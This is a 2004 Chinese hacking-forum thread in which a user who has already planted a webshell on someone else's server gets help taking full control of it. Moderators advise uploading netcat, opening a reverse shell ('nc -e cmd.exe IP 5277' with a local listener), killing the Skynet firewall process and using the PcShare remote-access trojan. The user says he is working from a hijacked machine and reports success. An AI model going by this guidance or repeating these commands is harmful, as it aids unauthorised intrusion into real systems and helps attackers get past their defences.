|
 | 作者: firestar [firestar]
 论坛用户 |
登录 |
| 好不容易通过Webshell 建立了一个帐号,却发现端口过滤了,我扫描了一下只开80端口,请教一下高手有什么好的办法拿到系统管理员权限,请求方法,思路. |
| 地主 发表时间: 04-12-10 11:26 |
 | 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
反向�B接 |
| B1层 发表时间: 04-12-10 12:18 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
能说的详细点妈? 我放了个反弹的木马好像还是不行! |
| B2层 发表时间: 04-12-10 21:02 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
我不知道你用什么办法加的 系统管理员帐户 但是我想你的WEB SHELL 一定有执行权限吧 ! 那么你可以在自己的机器上用NC.EXE 监视一个端口 然后给服务器也上传一个NC.EXE 然后让对方反响 想你连接! 这样你就能得到一个CMD下的 SHELL 然后查看对方的服务器具体情况具体分析! 比如对方是用防火墙过滤了80以外的所有端口 那么你就要想办法关闭对方的防火墙. 如果对方要是在 TCP/IP 那里设置了只开放80 那么我想你用反响连接端口的木马应该也没有问题. 如果有硬件防火墙 那么 ..........我就不会了! 如果你不会用NC 反响连接 你可以去我的站看一下 上面有一个NC 反响连接的教程! (非广告,我的站非常非常慢,没有一定耐心的人是什么也看不到的!呵呵  ) HTTP://WWW.SWBL.INFO 呵呵 你先慢慢等吧 等FLASH 动画全部下载完以后你就可以看到下载地址了! |
| B3层 发表时间: 04-12-11 13:38 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
谢谢了!有思路了! |
| B4层 发表时间: 04-12-12 20:39 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
对方装的是天网2.7的,什么命令可以KILL 掉! |
| B5层 发表时间: 04-12-12 20:44 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
我在对方运行如下命令: D:\528sh\servu.exe "nc -e cmd.exe IP 5277" 我在本地机上运行如下命令: d:\tool\nc -l -v -p 5277 我这样做的,还是不行,是不是我命令错了啊! 对方装的是天网2.7的! [此贴被 firestar(firestar) 在 12月12日21时10分 编辑过] [此贴被 firestar(firestar) 在 12月12日21时12分 编辑过] |
| B6层 发表时间: 04-12-12 21:09 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
 |
| B7层 发表时间: 04-12-12 21:15 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
->如果对方要是在 TCP/IP 那里设置了只开放80 那么我想你用反响连接端口的木马应该也没有问题. 我那个反弹木马好像不行,你能不能给我介绍一个,可以的话最好给个连接! |
| B8层 发表时间: 04-12-12 21:18 |
 | 回复: bking [bking]  版主 |
登录 |
|
20cn PcShare www.20cn.net/download |
| B9层 发表时间: 04-12-12 21:24 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
谢谢版主的推荐! |
| B10层 发表时间: 04-12-13 15:11 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
命令没有错误! 但是天网默认 程序 出站 入站 都要经过允许 才可以的! 否则默认都是拒绝! 所以你那样做是不行的! 你要先想办法KILL 对方的防火墙! 这样才能有办法得到对方的CMD 而且你需要有外网IP 才能使用上面的命令! 你明白我的意思么? 我在这里只能给你提供思路! 但是具体实行办法要看你自己! 你可以给对方上传一个杀进程的小程序,如果你没有我这有! 可以联系我!我QQ(资料上有!) KILL 了对方的防火墙 并且有外网IP 那么刚才的命令应该没有问题! |
| B11层 发表时间: 04-12-13 21:24 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
好的,我联系你好了! 我的QQ是:153979747 希望能加你解决问题,本人入侵只是想学到思路和方法,并非破坏! |
| B12层 发表时间: 04-12-14 11:31 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
其实我用的是电信的电脑(肉鸡)应该没问题,我上传了一个kill.exe 这个我是用来杀进程的! |
| B13层 发表时间: 04-12-14 11:33 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
KILL了对方的防火墙 找个扫描器 查看对方开放了什么端口 来确定对方的防火墙是否被KILL了 |
| B14层 发表时间: 04-12-14 11:38 |
| 回复: asd484 [asd484] 论坛用户 |
登录 |
|
为了学习,每帖必看! 有很多问题啊 请问,NC.EXE是什么? |
| B15层 发表时间: 04-12-14 15:53 |
 | 回复: bellamy [bellamy]  论坛用户 |
登录 |
|
瑞士军刀 |
| B16层 发表时间: 04-12-14 19:16 |
| 回复: firestar [firestar] 论坛用户 |
登录 |
|
首先非常感谢" 斯文败类 "的帮忙,我的问题终于解决了! 人家说20cn高手如云,果然名不虚传! |
| B17层 发表时间: 04-12-14 23:40 |
| 回复: qmdjzgqt [qmdjzgqt] 论坛用户 |
登录 |
 |
| B18层 发表时间: 04-12-15 01:17 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 端口过滤了3389,但是帐号已经建立怎么拿到系统管理权限?